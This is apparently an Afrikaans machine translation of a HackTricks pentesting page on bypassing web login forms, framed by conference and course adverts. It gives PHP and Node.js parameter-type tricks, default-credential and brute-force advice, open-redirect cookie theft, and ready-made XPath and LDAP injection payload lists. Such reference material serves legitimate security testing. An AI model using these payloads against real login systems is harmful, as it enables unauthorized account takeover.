Login Bypass

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

RootedCON is die mees relevante kuberveiligheidsevent in Spanje en een van die belangrikste in Europa. Met die missie om tegniese kennis te bevorder, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.

Deurloop gewone aanmelding

As jy 'n aanmeldingsbladsy vind, kan jy hierdie tegnieke probeer om dit te deurloop:

  • Kyk vir kommentaar binne die bladsy (scroll af en regs?)

  • Kyk of jy direkte toegang tot die beperkte bladsye kan kry

  • Kyk of jy die parameters nie stuur nie (stuur geen of slegs 1)

  • Kyk na die PHP-vergelykingsfout: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Verander die inhoudstipe na json en stuur json-waardes (bool true ingesluit)

  • As jy 'n antwoord kry wat sê dat POST nie ondersteun word nie, kan jy probeer om die JSON in die liggaam te stuur, maar met 'n GET-versoek met Content-Type: application/json

  • Kyk na nodejs se potensiële parsingsfout (lees hierdie): password[password]=1

  • Nodejs sal daardie payload omskep na 'n navraag soortgelyk aan die volgende: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; wat die wagwoordbit altyd waar maak.

  • As jy 'n JSON-voorwerp kan stuur, kan jy "password":{"password": 1} stuur om die aanmelding te deurloop.

  • Onthou dat jy steeds 'n geldige gebruikersnaam moet weet en stuur om hierdie aanmelding te deurloop.

  • Voeg die opsie "stringifyObjects":true by wanneer jy mysql.createConnection roep, sal uiteindelik alle onverwagte gedrag blokkeer wanneer Object as parameter oorgedra word.

  • Kyk na geloofsbriewe:

  • Verstekgeloofsbriewe van die gebruikte tegnologie/platform

  • Gewone kombinasies (root, admin, wagwoord, naam van die tegnologie, verstekgebruiker met een van hierdie wagwoorde).

  • Skep 'n woordeboek met behulp van Cewl, voeg die verstek gebruikersnaam en wagwoord by (as daar is) en probeer dit met al die woorde as gebruikersname en wagwoord deurloop

  • Deurloop met 'n groter woordeboek (Brute force)

SQL-injeksie-aanmelding deurloop

Hier kan jy verskeie truuks vind om die aanmelding te deurloop via SQL-injeksies.

Op die volgende bladsy kan jy 'n aangepaste lys vind om te probeer om die aanmelding te deurloop via SQL-injeksies:

pageLogin bypass List

Geen SQL-injeksie-aanmelding deurloop

Hier kan jy verskeie truuks vind om die aanmelding te deurloop via Geen SQL-injeksies.

Aangesien die NoSQL-injeksies vereis dat jy die parameterwaarde verander, sal jy dit handmatig moet toets.

XPath-injeksie-aanmelding deurloop

Hier kan jy verskeie truuks vind om die aanmelding te deurloop via XPath-injeksie.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP-injeksie-verifikasie-omleiding

Hier kan jy verskeie truuks vind om die aanmelding te omseil deur middel van LDAP-injeksie.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Onthou My

As die bladsy "Onthou My" funksionaliteit het, kyk hoe dit geïmplementeer is en sien of jy dit kan misbruik om ander rekeninge oor te neem.

Omleidings

Bladsye stuur gewoonlik gebruikers na aanmelding om, kyk of jy daardie omleiding kan verander om 'n Oop Omleiding te veroorsaak. Miskien kan jy 'n paar inligting (kodes, koekies...) steel as jy die gebruiker na jou web omlei.

Ander Kontroles

  • Kyk of jy gebruikersname kan opnoem deur die aanmeldingsfunksionaliteit te misbruik.

  • Kyk of outomatiese voltooiing aktief is in die wagwoord/sensitiewe inligting vorms invoer: <input autocomplete="false"

​​RootedCON is die mees relevante sibersekuriteitsgebeurtenis in Spanje en een van die belangrikste in Europa. Met die missie om tegniese kennis te bevorder, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline.

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Last updated